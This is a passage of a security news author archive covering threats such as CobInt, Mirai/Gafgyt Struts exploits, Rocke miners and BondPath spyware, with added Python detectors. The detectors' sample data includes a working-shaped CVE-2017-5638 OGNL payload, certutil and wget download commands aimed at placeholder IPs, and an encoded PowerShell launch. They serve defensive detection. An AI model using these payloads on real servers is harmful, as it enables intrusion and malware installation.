Author Archives: David Bisson

Cobalt Gang Using CobInt Downloader to Install Malware on Systems of Interest

The threat group known as Cobalt Gang is using a new downloader called CobInt to gain an initial foothold and then install additional malware on systems of interest.

In August and September, Proofpoint observed four separate financially motivated attack campaigns from Cobalt Gang. Each of the operations used malicious URLs and Microsoft Word documents to download the first stage of CobInt malware.

In this first stage, a basic downloader installed the main malware component, which was in turn responsible for executing the various modules of the next stage.

Researchers observed two modules at the time of discovery: one sends a screenshot to the command-and-control (C&C) server, and another builds and transfers a list of running processes on the infected machine. Proofpoint also reasoned that CobInt likely loads additional modules on systems of interest once this reconnaissance stage is complete.

What’s Driving the Rise of Malicious Downloaders?

According to Proofpoint, Cobalt Gang stopped using CobInt in May 2018 before picking it up again two months later. This return coincided with a rise in the use of downloaders to initially infect machines, conduct reconnaissance and install additional malware, as evidenced by Proofpoint’s discovery of two other downloaders, Marap and Advisorsbot, in August.

Separately, two other malware families with downloader capabilities took second and third place in Check Point's "Most Wanted Malware" list for August 2018. Check Point also tracked growth in banking Trojan activity for the month, with malicious downloaders helping to fuel that development.

How to Defend Against CobInt and Other Downloaders

Security professionals can defend their organizations against downloaders like CobInt by using artificial intelligence (AI) tools to aid threat detection and by deploying cyber deception to misdirect evasive malware. IBM experts also recommend monitoring and analyzing how applications behave across user devices and flagging anomalous behavior, so that an infection is caught at the downloader stage rather than after the later modules have run.
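One concrete form of the behavioral monitoring recommended above is to watch for an Office application spawning a script host or download utility, which is how a malicious Word document usually kicks off a downloader chain. The following is an added example and is not Proofpoint's or IBM's code; the event format mimics a Sysmon process-creation record flattened to one JSON object per line, and the parent/child name lists, sample events, paths and GUIDs are all constructed for illustration.

```python
"""Flag Office applications that spawn script hosts or downloaders.

Added example (not Proofpoint's or IBM's code).  Each event mimics a Sysmon
Event ID 1 (process creation) record flattened to one JSON object per line;
the parent/child name lists, the sample events, paths and GUIDs are
constructed for illustration.
"""
import json
import re

# Office hosts that rarely have a legitimate reason to spawn interpreters
# or download utilities (assumption; extend for your estate).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Children commonly used by macro-driven downloaders (assumption; tune to taste).
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe",
}

# Command-line fragments that point at a download or an encoded payload.
DOWNLOAD_HINTS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|"
    r"https?://|-enc(odedcommand)?\b|urlcache)",
    re.IGNORECASE,
)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one process-creation event (dict)."""
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS:
        reasons.append("Office parent " + parent)
        if child in SUSPICIOUS_CHILDREN:
            reasons.append("spawned " + child)
        if DOWNLOAD_HINTS.search(cmdline):
            reasons.append("download or encoded-command hint in command line")
    return len(reasons), reasons


def detect(lines, threshold=2):
    """Parse JSON-per-line events; return [(ProcessGuid, score, reasons)] for
    events at or above the threshold.  A lone Office parent (score 1) is
    normal, e.g. Word spawning a print helper, so it is not reported."""
    hits = []
    for index, line in enumerate(lines):
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event.get("ProcessGuid", str(index)), score, reasons))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    r'{"ProcessGuid":"A","ParentImage":"C:\\Program Files\\Microsoft Office\\WINWORD.EXE",'
    r'"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",'
    r'"CommandLine":"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A"}',
    r'{"ProcessGuid":"B","ParentImage":"C:\\Windows\\explorer.exe",'
    r'"Image":"C:\\Program Files\\Microsoft Office\\WINWORD.EXE",'
    r'"CommandLine":"WINWORD.EXE /n C:\\Users\\alice\\Downloads\\invoice.docx"}',
    r'{"ProcessGuid":"C","ParentImage":"C:\\Program Files\\Microsoft Office\\WINWORD.EXE",'
    r'"Image":"C:\\Windows\\splwow64.exe","CommandLine":"splwow64.exe 12288"}',
    r'{"ProcessGuid":"D","ParentImage":"C:\\Program Files\\Microsoft Office\\EXCEL.EXE",'
    r'"Image":"C:\\Windows\\System32\\cmd.exe",'
    r'"CommandLine":"cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/s.exe s.exe"}',
]

if __name__ == "__main__":
    for guid, score, reasons in detect(SAMPLE_EVENTS):
        print(guid, score, "; ".join(reasons))
```

The threshold matters: Word legitimately spawns helpers such as the print spooler shim, so an Office parent alone scores 1 and stays quiet, while an Office parent plus a script host or a download hint in the command line is what gets reported.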

Sources: Proofpoint, Proofpoint(1), Check Point

The post Cobalt Gang Using CobInt Downloader to Install Malware on Systems of Interest appeared first on Security Intelligence.

ICO to Fine Equifax £500,000 for 2017 Data Breach

The Information Commissioner’s Office (ICO) of the United Kingdom announced it will fine Equifax £500,000 for a data breach that occurred in 2017. In a monetary penalty notice filed on 19 September, the ICO revealed its decision to impose the maximum fine specified in section 55A of the Data Protection Act 1998 on Equifax. The […]

The post ICO to Fine Equifax £500,000 for 2017 Data Breach appeared first on The State of Security.

State Department Says Some Employee Info Possibly Exposed in Security Incident

The U.S. State Department said that some employees’ information might have been exposed in a recent security incident. In a notice shared by Politico, the State Department disclosed that “activity of concern” on an email system might have exposed some employees’ personally identifiable information (PII). IT personnel inside the Department determined that the activity affected […]

The post State Department Says Some Employee Info Possibly Exposed in Security Incident appeared first on The State of Security.

A Quarter of Civilian Federal Agencies Have Adopted DMARC and SPF for All Domains

A quarter of civilian federal agencies have adopted DMARC and SPF email authentication protocols for all their domains in compliance with a mandate. Thirty-four of 133 agencies are now fully compliant with what is known as BOD 18-01. Issued by the Department of Homeland Security (DHS), the mandate requires civilian federal agencies within its […]
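What "fully compliant" looks like at the DNS level is easy to check yourself. The following is an added example, not DHS's, Agari's or any agency's code. It assumes that the email portion of BOD 18-01 comes down to a valid SPF record plus a DMARC record whose policy is p=reject, applied to all mail and not weakened for subdomains; the domains and records are constructed and belong to no real agency.

```python
"""Grade SPF and DMARC records against BOD 18-01's email requirements.

Added example, not DHS's, Agari's or any agency's code.  Assumptions: "fully
compliant" means a valid SPF record plus a DMARC record whose policy is
p=reject, applied to 100 percent of mail and not weakened for subdomains;
the records below are constructed and do not belong to any real agency.
"""

POLICY_RANK = {"none": 0, "quarantine": 1, "reject": 2}


def parse_dmarc_tags(record):
    """Turn 'v=DMARC1; p=reject; rua=...' into a dict with lower-case keys."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def check_spf(record):
    """Return (valid, notes).  Valid means v=spf1 with a terminal 'all'
    mechanism; ~all is accepted but noted, +all/?all/all are rejected."""
    if not record:
        return False, ["no SPF record"]
    terms = record.split()
    if terms[0].lower() != "v=spf1":
        return False, ["record does not start with v=spf1"]
    last = terms[-1].lower()
    if last == "-all":
        return True, []
    if last == "~all":
        return True, ["~all: spoofed mail is soft-failed, not rejected"]
    if last in ("+all", "all", "?all"):
        return False, [last + " permits any sender"]
    return False, ["no terminal 'all' mechanism"]


def check_dmarc(record):
    """Return (policy, notes); policy is 'none', 'quarantine', 'reject' or None."""
    if not record:
        return None, ["no DMARC record"]
    tags = parse_dmarc_tags(record)
    policy = tags.get("p", "").lower()
    if tags.get("v", "").upper() != "DMARC1" or policy not in POLICY_RANK:
        return None, ["malformed DMARC record (needs v=DMARC1 and a valid p=)"]
    notes = []
    if "rua" not in tags:
        notes.append("no rua= address, so no aggregate reports")
    if tags.get("pct", "100") != "100":
        notes.append("pct=" + tags["pct"] + ": policy applied to only part of the mail")
    sub_policy = tags.get("sp", policy).lower()
    if POLICY_RANK.get(sub_policy, -1) < POLICY_RANK[policy]:
        notes.append("subdomain policy sp=" + sub_policy + " is weaker than p=" + policy)
    return policy, notes


def grade_domain(spf_record, dmarc_record):
    """Return {'status': 'full'|'partial'|'none', 'notes': [...]}."""
    spf_ok, spf_notes = check_spf(spf_record)
    policy, dmarc_notes = check_dmarc(dmarc_record)
    enforcing = policy == "reject" and not any(
        n.startswith(("pct=", "subdomain policy")) for n in dmarc_notes)
    if spf_ok and enforcing:
        status = "full"
    elif spf_ok or policy is not None:
        status = "partial"
    else:
        status = "none"
    return {"status": status, "notes": spf_notes + dmarc_notes}


def grade_all(domains):
    """domains: {name: (spf_record, dmarc_record)} -> {name: grade}."""
    return {name: grade_domain(spf, dmarc) for name, (spf, dmarc) in domains.items()}


def fully_compliant_share(grades):
    """Fraction of domains graded 'full' (0.0 when there are none)."""
    if not grades:
        return 0.0
    return sum(g["status"] == "full" for g in grades.values()) / len(grades)


# Constructed records for made-up domains.
SAMPLE_DOMAINS = {
    "agency-a.example": ("v=spf1 include:_spf.mail.example -all",
                         "v=DMARC1; p=reject; rua=mailto:dmarc@agency-a.example"),
    "agency-b.example": ("v=spf1 ip4:192.0.2.0/24 ~all",
                         "v=DMARC1; p=none; rua=mailto:dmarc@agency-b.example"),
    "agency-c.example": (None, "v=DMARC1; p=reject; pct=50"),
    "agency-d.example": ("v=spf1 mx +all", None),
}

if __name__ == "__main__":
    grades = grade_all(SAMPLE_DOMAINS)
    for name, grade in grades.items():
        print(name, grade["status"], "; ".join(grade["notes"]))
    print("fully compliant:", fully_compliant_share(grades))
```

Two of the traps this catches are easy to miss when eyeballing records: a p=reject record with pct=50 only rejects half of the failing mail, and an sp= tag can quietly leave every subdomain at p=none while the apex looks enforced.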

The post A Quarter of Civilian Federal Agencies Have Adopted DMARC and SPF for All Domains appeared first on The State of Security.

Ransomware Attack Takes Down Airport’s Flight Information Screens

A ransomware attack prevented an English airport from using its flight information screens to assist passengers in their travels. On 13 September, Bristol Airport tweeted out that its flight information systems were experiencing technical difficulties. We are currently experiencing technical problems with our flight information screens. Flights are unaffected and details of check-in desks, boarding […]

The post Ransomware Attack Takes Down Airport’s Flight Information Screens appeared first on The State of Security.

Mirai and Gafgyt IoT Malware Now Targeting SonicWall’s GMS and Apache Struts Exploits

Security researchers discovered modified versions of the Mirai and Gafgyt Internet of Things (IoT) malware that are capable of targeting vulnerabilities affecting SonicWall’s Global Management System (GMS) and Apache Struts.

Earlier this month, Palo Alto Networks’ Unit 42 found a domain hosting a variant of the Mirai botnet containing exploits for 16 separate vulnerabilities. One of those flaws was the Apache Struts vulnerability (CVE-2017-5638) associated with a major 2017 data breach. This was the first time security professionals observed Mirai targeting Apache Struts, a framework used for developing web applications.

The researchers’ analysis of Mirai led them to observe that the malicious domain previously resolved to a different IP address. Further investigation revealed that the IP address intermittently hosted a version of the Gafgyt botnet containing an exploit for CVE-2018-9866, a vulnerability affecting an older version of SonicWall’s GMS.
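Because the Struts flaw in that exploit set is triggered through a crafted Content-Type header carrying an OGNL expression, a detector can work from that header alone. The following is an added example and not Unit 42's code. It assumes a proxy or WAF exporting one JSON object per request that includes the Content-Type value (ordinary access logs do not record it); the addresses and payload are constructed, with the payload copying the shape of the public proof of concept, including its #cmd= variable.

```python
"""Spot CVE-2017-5638-style OGNL injection in logged Content-Type headers.

Added example; not Unit 42's code.  The Struts flaw named above is triggered
through a crafted Content-Type header carrying an OGNL expression, so the
detector inspects that header.  Ordinary access logs do not record it, so the
sample below assumes a proxy or WAF exporting one JSON object per request
(format, addresses and payload are constructed; the payload copies the shape of
the public proof of concept, including its #cmd= variable).
"""
import json
import re

# Fragments that have no business in a Content-Type value.
OGNL_MARKERS = re.compile(
    r"%\{|#_memberAccess|#context\b|ognl\.OgnlContext|@java\.lang\.Runtime@|"
    r"ProcessBuilder|allowStaticMethodAccess|DEFAULT_MEMBER_ACCESS",
    re.IGNORECASE,
)
# The exploit embeds 'multipart/form-data' inside the expression rather than
# at the start of the header, which is where a real multipart header has it.
MULTIPART_AT_START = re.compile(r"^\s*multipart/form-data", re.IGNORECASE)
# The public PoC stores the command in an OGNL variable named #cmd.
CMD_VAR = re.compile(r"#cmd\s*=\s*'([^']*)'")


def classify_content_type(value):
    """Return a list of findings for one Content-Type header value."""
    findings = []
    if not value:
        return findings
    if OGNL_MARKERS.search(value):
        findings.append("OGNL expression in Content-Type")
    if "multipart/form-data" in value.lower() and not MULTIPART_AT_START.match(value):
        findings.append("multipart/form-data not at start of header")
    if len(value) > 256:
        findings.append("oversized Content-Type (%d bytes)" % len(value))
    return findings


def detect(lines):
    """Parse JSON-per-line request records; return a list of alert dicts."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        ct = rec.get("content_type", "")
        findings = classify_content_type(ct)
        if not findings:
            continue
        match = CMD_VAR.search(ct)
        alerts.append({
            "src": rec.get("src"),
            "path": rec.get("path"),
            "findings": findings,
            "cmd": match.group(1) if match else None,
        })
    return alerts


# Constructed sample requests (addresses from documentation ranges).
_EXPLOIT_CT = (
    "%{(#_='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#_memberAccess?(#_memberAccess=#dm):(#context.setMemberAccess(#dm)))."
    "(#cmd='wget http://203.0.113.5/bins/x86 -O /tmp/x')."
    "(#p=new java.lang.ProcessBuilder(#cmd.split(' '))).(#process=#p.start())}"
)
SAMPLE_LINES = [json.dumps(r) for r in [
    {"src": "198.51.100.7", "method": "POST", "path": "/upload.action",
     "content_type": "multipart/form-data; boundary=----WebKitFormBoundaryabc", "status": 200},
    {"src": "203.0.113.77", "method": "POST", "path": "/struts2-showcase/index.action",
     "content_type": _EXPLOIT_CT, "status": 200},
    {"src": "192.0.2.9", "method": "GET", "path": "/index.action",
     "content_type": "", "status": 200},
]]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LINES):
        print(alert["src"], alert["path"], alert["findings"], alert["cmd"])
```

Pulling the #cmd value out of a hit is what turns a signature match into something actionable: the download URL it contains is the next indicator to block and to hunt for on other hosts. The check for "multipart/form-data" appearing somewhere other than the start of the header is worth keeping even if the OGNL markers are changed by an attacker, since the vulnerable code path is only reached when that string is present.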

Mirai and Gafgyt Signal Shift Toward Enterprise-Level Attacks

Both Mirai and Gafgyt have been around for some time. Even so, Unit 42 detected three new attack campaigns from the two malware families in May 2018. Those campaigns also exploited vulnerabilities in IoT devices, but all of the affected products were consumer-oriented. The researchers posited that the addition of exploits for Apache Struts and SonicWall’s GMS could signal a shift toward attack campaigns targeting enterprise-level devices.

How to Defend Against IoT Malware

Security professionals can defend against this class of threat by maintaining a dedicated incident response team that remediates exploited vulnerabilities, such as the Apache Struts and GMS flaws above, and handles public disclosure of any resulting breach. They should also consider investing in data protection solutions and conducting gap analyses that cover the data generated by their employer’s IoT devices.

Finally, security personnel should aim to isolate IoT devices on their own network and establish access controls between these products and critical IT resources.

Sources: Palo Alto Networks, Palo Alto Networks(1)

The post Mirai and Gafgyt IoT Malware Now Targeting SonicWall’s GMS and Apache Struts Exploits appeared first on Security Intelligence.

ICO Receiving 500 Breach-Related Calls a Week Since GDPR Took Effect

The United Kingdom’s Information Commissioner’s Office (ICO) has been receiving 500 calls a week pertaining to data breaches since the European Union’s General Data Protection Regulation (GDPR) took effect. Speaking before hundreds of senior business leaders at the Confederation of British Industry’s (CBI’s) fourth annual Cyber Security Conference, ICO deputy commissioner James Dipple-Johnstone revealed that of the […]

The post ICO Receiving 500 Breach-Related Calls a Week Since GDPR Took Effect appeared first on The State of Security.

OilRig Launching Attack Campaigns With Updated BONDUPDATER Trojan

The OilRig group conducted at least one attack campaign containing an updated variant of the BONDUPDATER trojan as its final payload. In August 2018, Palo Alto Networks’ Unit 42 threat research team detected an OilRig campaign targeting a high-ranking government organization in the Middle East. The email campaign leveraged spear-phishing, one of the most common […]

The post OilRig Launching Attack Campaigns With Updated BONDUPDATER Trojan appeared first on The State of Security.

What is Vulnerability Management Anyway?

Vulnerability management (VM) programs are the meat and potatoes of every comprehensive information security program. They are not optional anymore. In fact, many information security compliance, audit and risk management frameworks require organizations to maintain a vulnerability management program. If you don’t have vulnerability management tools, or if your VM program is ad hoc, there’s […]

The post What is Vulnerability Management Anyway? appeared first on The State of Security.

Researchers Observe Threat Actor Using Varied Tools and Payloads to Distribute Monero Miners

A new threat actor is leveraging a varied tool kit and multiple payloads to distribute cryptomining malware, including Monero miners.

In April, Cisco Talos observed a new threat actor named Rocke using western and Chinese Git repositories to deliver cryptomining malware to honeypots that were vulnerable to an Apache Struts vulnerability.

Researchers detected Rocke conducting a similar campaign in July. In that operation, the threat actor communicated with an HTTP File Server (HFS) hosting 11 files. Two of those files, “TermsHost.exe” and “Config.json”, were a Monero miner executable and its configuration file, respectively. Many of the other hosted assets were shell scripts that downloaded and executed the miners, or that killed processes commonly associated with other cryptomining malware or with cryptomining in general.

Cryptomining Malware Continues to Grow

Rocke’s attack campaigns represent the latest offensives in an ongoing surge of cryptomining malware. In the first quarter of 2018, McAfee Labs detected a 629 percent increase in these threats, with the total number of detected samples rising from 400,000 to more than 2.9 million.

This growth coincides with a FireEye report that found a sharp increase in underground conversations containing cryptocurrency mining-related keywords beginning in 2017 and continuing through the first quarter of 2018.

These findings are also consistent with a sixfold increase in attacks involving embedded mining tools, which IBM Managed Security Services (MSS) observed between January and August 2017.

Defending Against Monero Miners

Security professionals can defend their organizations against threat actors that aim to spread Monero miners by scanning for the indicators of compromise (IoCs) identified in Cisco Talos’ report. Organizations should also consider implementing security best practices that offer blanket protection against malware and other digital threats. These controls should include the creation of a patch prioritization plan for security weaknesses affecting servers and other critical IT assets.
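Beyond matching a published IoC list, the artifacts described above (a miner binary driven by a dropped configuration file, plus scripts that kill competing miners) suggest two host-level checks that generalize to other miner campaigns: scan process command lines for pool URLs, wallet addresses and miner flags, and pull the pool and wallet out of any miner configuration found on disk. The following is an added example, not Cisco Talos's code. The config layout (a "pools" list of url/user/pass objects) follows the XMRig convention; the process list, wallet string, pool hostnames and port list are constructed placeholders.

```python
"""Triage a host for Monero-mining indicators.

Added example; not Cisco Talos's code.  Two checks: scan process command lines
for pool URLs, wallet addresses and miner flags, and pull the pool and wallet
out of a dropped miner configuration of the kind described above ("Config.json").
The config layout (a "pools" list of url/user/pass objects) follows the XMRig
convention; the process list, wallet string and config are constructed.
"""
import json
import re

STRATUM_URL = re.compile(r"stratum\+(?:tcp|ssl)://([^\s'\"]+)", re.IGNORECASE)
# Standard Monero addresses are 95 base58 characters starting with '4'
# (subaddresses start with '8').
XMR_ADDRESS = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
# Flags typical of XMRig-style miners (assumption; extend from your own samples).
MINER_FLAGS = re.compile(
    r"(--donate-level|--algo[= ]|cryptonight|-o\s+stratum\+|--coin[= ]|--keepalive)",
    re.IGNORECASE,
)
# Stratum ports commonly seen at public pools (assumption; tune to your telemetry).
COMMON_POOL_PORTS = {3333, 4444, 5555, 7777, 8080, 14444, 45700}


def scan_processes(processes):
    """processes: iterable of (pid, command line).  Returns [(pid, reasons)]."""
    hits = []
    for pid, cmdline in processes:
        reasons = []
        pool = STRATUM_URL.search(cmdline)
        if pool:
            reasons.append("stratum pool " + pool.group(1))
        if XMR_ADDRESS.search(cmdline):
            reasons.append("Monero address on command line")
        if MINER_FLAGS.search(cmdline):
            reasons.append("miner-style flags")
        if reasons:
            hits.append((pid, reasons))
    return hits


def split_host_port(url):
    """'stratum+tcp://host:3333' -> ('host', 3333); port is None if absent."""
    hostport = url.rpartition("://")[2]
    host, sep, port = hostport.rpartition(":")
    if not sep or not port.isdigit():
        return hostport, None
    return host, int(port)


def parse_miner_config(text):
    """Extract pool host/port and wallet from an XMRig-style JSON config."""
    cfg = json.loads(text)
    pools = []
    for pool in cfg.get("pools", []):
        host, port = split_host_port(pool.get("url", ""))
        wallet = pool.get("user", "")
        pools.append({
            "host": host,
            "port": port,
            "common_pool_port": port in COMMON_POOL_PORTS,
            "wallet": wallet,
            "wallet_looks_monero": bool(XMR_ADDRESS.fullmatch(wallet)),
        })
    return pools


# Constructed placeholder: right shape (4 + 94 base58 chars), not a real wallet.
WALLET = "4" + "A" * 94

# Constructed process list; 1234 mirrors the TermsHost/Config.json pairing above.
SAMPLE_PROCESSES = [
    (77, "/usr/sbin/sshd -D"),
    (910, "/bin/sh /tmp/kill.sh"),
    (1234, "/tmp/TermsHost -o stratum+tcp://pool.example.invalid:3333 -u "
           + WALLET + " -p x --donate-level=1"),
    (2200, "./kworkerds --algo=cryptonight"),
]

SAMPLE_CONFIG = json.dumps({
    "algo": "cryptonight",
    "pools": [{"url": "stratum+tcp://pool.example.invalid:3333",
               "user": WALLET, "pass": "x"}],
})

if __name__ == "__main__":
    for pid, reasons in scan_processes(SAMPLE_PROCESSES):
        print(pid, "; ".join(reasons))
    for pool in parse_miner_config(SAMPLE_CONFIG):
        print(pool)
```

The wallet address is the most durable indicator here: binaries get repacked and pool hostnames rotate, but the attacker has to keep paying into the same address to collect, so it is worth carrying into your IoC set alongside the hashes and domains from the report.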

Sources: Cisco Talos, McAfee Labs, FireEye

The post Researchers Observe Threat Actor Using Varied Tools and Payloads to Distribute Monero Miners appeared first on Security Intelligence.

Beware the Homeless Homebuyer Real Estate Scam!

Security professionals are warning users who are or soon will be engaged in real estate transactions to watch out for the “homeless homebuyer” scam. On 10 September, Verdict built upon its coverage of account takeover attacks found in its threat insight magazine Verdict Encrypt to discuss this particular scam. The homeless homebuyer ruse first begins […]

The post Beware the Homeless Homebuyer Real Estate Scam! appeared first on The State of Security.

60 Percent of Targeted Email Attacks Aimed at Contributors and Lower Management

Well over half of targeted email attacks between April and June 2018 were aimed at individual contributors and low-level managers, according to a new report.

Proofpoint researchers discovered that individual contributors and low-level management together accounted for 60 percent of highly targeted attacks, which consisted primarily of malware and credential phishing. By comparison, upper management and executives received 23.5 percent and 5.2 percent of targeted attacks, respectively.

The enterprise security firm noted that those findings show how upper management and executives sustained “a disproportionately large share of attacks” given their smaller representation in the total workforce.

Email Attacks Are Surging Across Industries

These findings come amid an ongoing surge in malicious email messages: The researchers observed a 36 percent increase in email attacks between the first and second quarters of 2018. While companies of every size were targeted, some industries, such as retail, healthcare and government, experienced greater rates of growth for business email compromise (BEC) than other sectors.

The report revealed that most companies across all industries had been targeted by email fraudsters at least once. The number of attacks rose by 85 percent in the second quarter compared to the previous year. The growth rates were even larger for the automotive and education industries, at 400 percent and 250 percent, respectively.

How to Defend Against Targeted Attacks

Proofpoint advised security professionals to defend individual contributors, lower-level management and other staff members against targeted email attacks by partnering with a threat intelligence firm and leveraging a social media security solution to combat fake online accounts. Security teams should also consider creating a comprehensive security awareness program for the entire workforce.

Source: Proofpoint

The post 60 Percent of Targeted Email Attacks Aimed at Contributors and Lower Management appeared first on Security Intelligence.

Tesla Encouraging “Good Faith” Security Research in Bug Bounty Program

Electric vehicle manufacturer Tesla is encouraging what it calls “good faith” security research in its bug bounty program. In its vulnerability disclosure program, Tesla says it welcomes “the community to participate in our responsible reporting process” for the company’s product offerings and services. Researchers who participate in the program must report a vulnerability along with […]

The post Tesla Encouraging “Good Faith” Security Research in Bug Bounty Program appeared first on The State of Security.

Compromised Chrome Extension Snooped on Users’ Credentials, Cryptocurrency Private Keys

Someone compromised a Google Chrome extension with malicious code designed to snoop on users’ account credentials and cryptocurrency private keys. On 4 September, a security researcher who goes by the name “SerHack” tweeted out a warning about version 3.39.4 of the Chrome extension for MEGA.nz, a cloud storage and file sharing service. !!! WARNING !!!!!!! […]

The post Compromised Chrome Extension Snooped on Users’ Credentials, Cryptocurrency Private Keys appeared first on The State of Security.

More Than a Quarter of Executives View Security Investments as Having a Negative ROI

According to a new digital trust report, 27 percent of business executives view security investments as having a negative return on investment (ROI).

Of these respondents, more than three-quarters said they had been involved in a publicly disclosed data breach in the past, according to “The Global State of Online Digital Trust Survey and Index 2018” by CA Technologies.

This finding led the report’s authors to conclude that “over one quarter of executives are tone deaf to modern security challenges and data breach implications, and have not learned from previous mistakes.” By comparison, just 7 percent of cybersecurity staffers said they believe security investments produce a negative ROI.

The Trickiest Metric in Security

ROI is a tricky subject in the context of information security. According to CSO Online, digital security investments don’t produce greater profits, but instead contribute to “loss prevention,” or greater savings in the event of a security incident. This suggests that increased revenues shouldn’t factor into organizations’ decisions on whether to invest in digital security.

Another CSO Online piece proposed that ROI is the wrong metric for evaluating the efficacy of a digital security program. Instead, executives and board members should focus on network defender first principles. To get to the heart of these principles, executives need to determine how network defenders should spend their time and what they hope to achieve.

How to Quantify the ROI of Security Investments

To quantify the ROI of their organizations’ security investments, chief information security officers (CISOs) should consider adopting a zero-trust approach and focusing on people, programs and technology to improve their data security posture. They should also take the lead in improving formal risk management processes that evaluate information assets and vulnerabilities.

Sources: CA Technologies, CSO Online, CSO Online(1)

The post More Than a Quarter of Executives View Security Investments as Having a Negative ROI appeared first on Security Intelligence.

New BondPath Android Spyware Retrieves Chat Data From Messaging Apps

Researchers uncovered an Android spyware family called BondPath that is capable of retrieving chats from several mobile messaging apps while spying on other types of information.

BondPath has been around since May 2016, but in July 2018, researchers at Fortinet observed that some samples were still in the wild. Those specimens masqueraded as “Google Play Store Services,” an application signed by an unknown developer known only as “hola.” The name is intentionally similar to Google Play Services, the legitimate Google component that ships on most Android devices and underpins many Google APIs.

Once running, BondPath can steal an infected device’s browser history, call logs, emails and SMS messages. A few less common capabilities made it stand out to the researchers, such as monitoring the phone’s battery status and stealing chats from WhatsApp, Skype, Facebook, Line and other mobile messaging apps.
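The two traits above, a Google-branded name on a package signed by an unknown developer and a permission set that adds up to surveillance, can both be checked from a device inventory. The following is an added example and not Fortinet's code. It assumes a flattened inventory (package name, user-visible label, signing-certificate fingerprint, granted permissions) of the kind you can assemble from `adb shell dumpsys package`; the inventory, fingerprints, trusted-signer list and protected-name list are constructed placeholders.

```python
"""Flag installed Android packages that impersonate Google components.

Added example; not Fortinet's code.  Input is a flattened package inventory
(package name, user-visible label, signing-certificate SHA-256, granted
permissions) of the kind you can assemble from `adb shell dumpsys package`;
the inventory, fingerprints and trusted-signer list are constructed placeholders.
"""
import re

# Label fragments that only Google-signed packages should carry (assumption; extend).
PROTECTED_LABEL_FRAGMENTS = ("google play", "play services", "play store")
GOOGLE_PACKAGE_PREFIXES = ("com.google.android.", "com.android.vending")
# Signer fingerprints you have verified for Google packages (placeholder values).
TRUSTED_SIGNERS = {"AA" * 32}
# Permissions that together amount to the surveillance capability described above.
SPY_PERMISSIONS = {
    "android.permission.READ_SMS", "android.permission.READ_CALL_LOG",
    "android.permission.READ_CONTACTS", "android.permission.RECORD_AUDIO",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.READ_CALENDAR",
}


def normalize_label(label):
    """Lower-case, strip punctuation and collapse spaces so 'Google  Play-Store
    Services' compares equal to 'google play store services'."""
    return " ".join(re.sub(r"[^a-z0-9 ]", " ", label.lower()).split())


def impersonates_google(pkg):
    """True when a Google-branded label or package name has a non-Google signer."""
    label = normalize_label(pkg["label"])
    branded = any(f in label for f in PROTECTED_LABEL_FRAGMENTS) or \
        pkg["package"].startswith(GOOGLE_PACKAGE_PREFIXES)
    return branded and pkg["signer"].upper() not in TRUSTED_SIGNERS


def assess(inventory, spy_threshold=3):
    """Return [(package, reasons)] for packages worth a closer look."""
    findings = []
    for pkg in inventory:
        reasons = []
        if impersonates_google(pkg):
            reasons.append("Google-branded app signed by an untrusted certificate")
        spy = SPY_PERMISSIONS & set(pkg.get("permissions", ()))
        if pkg["signer"].upper() not in TRUSTED_SIGNERS and len(spy) >= spy_threshold:
            short = sorted(p.rsplit(".", 1)[-1] for p in spy)
            reasons.append("untrusted app with surveillance permissions: " + ", ".join(short))
        if reasons:
            findings.append((pkg["package"], reasons))
    return findings


# Constructed inventory: a genuine-looking Google package, an impostor, a benign app.
SAMPLE_INVENTORY = [
    {"package": "com.google.android.gms", "label": "Google Play services",
     "signer": "AA" * 32,
     "permissions": ["android.permission.READ_CONTACTS",
                     "android.permission.ACCESS_FINE_LOCATION",
                     "android.permission.READ_SMS"]},
    {"package": "com.example.gpss", "label": "Google Play Store Services",
     "signer": "CC" * 32,
     "permissions": ["android.permission.READ_SMS", "android.permission.READ_CALL_LOG",
                     "android.permission.READ_CONTACTS", "android.permission.INTERNET"]},
    {"package": "org.example.notes", "label": "Notes", "signer": "DD" * 32,
     "permissions": ["android.permission.INTERNET"]},
]

if __name__ == "__main__":
    for package, reasons in assess(SAMPLE_INVENTORY):
        print(package, "; ".join(reasons))
```

The signer check does the real work: a label can be anything the developer types, but an APK cannot be signed with Google's certificate without Google's key, so a Google-branded label paired with an unknown fingerprint is the thing to alert on. The permission rule is deliberately gated on the signer as well, because genuine platform packages legitimately hold most of those permissions.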

The Rise and Fall of Spyware

According to Verizon’s “2018 Data Breach Investigations Report,” spyware and keylogger malware were involved in 121 security incidents and 74 data breaches in 2017. This threat category increased its activity during the second half of 2017 and the beginning of 2018, yielding a 56 percent increase in detections during the first quarter of 2018, according to Malwarebytes. Malwarebytes named spyware the top detected business threat for the quarter, a ranking spurred in part by a series of large attack campaigns pushing Emotet.

Near the end of the first quarter, spyware activity declined significantly. It continued falling throughout the second quarter, ultimately decreasing by 40 percent, according to Malwarebytes. In that span of time, TrickBot, which had added cryptocurrency-theft capabilities earlier in the year, was the most prevalent form of spyware.

How to Protect Against Mobile Threats

